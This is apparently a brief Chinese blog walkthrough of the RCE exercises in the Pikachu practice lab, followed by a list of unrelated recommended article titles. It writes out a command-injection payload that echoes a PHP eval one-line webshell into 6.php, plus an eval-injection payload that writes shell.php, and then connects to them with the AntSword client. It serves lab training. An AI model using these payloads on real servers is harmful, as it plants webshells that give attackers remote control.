Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
jarreyer6 小时前
【AI Agent】大模型自动化载体
运维·自动化
xixingzhe27 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创7 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
翼龙云_cloud7 小时前
阿里云国际代理商:阿里云 ECS 全维度监控配置教程
运维·阿里云·云计算·监控
笑锝没心没肺8 小时前
fail2ban工具安装配置及使用
linux·运维·服务器
项目经理老王8 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
zt1985q9 小时前
本地部署开源智能家居集成平台 ioBroker 并实现外部访问( Windows 版本)
运维·服务器·智能家居
大卡片9 小时前
linux内核驱动开发
linux·运维·驱动开发
心心喵11 小时前
[linux] nohup和pm2的区别 进程保活
linux·运维·服务器
NGINX开源社区12 小时前
F5 NGINX Ingress Controller 5.3.0 新增功能
运维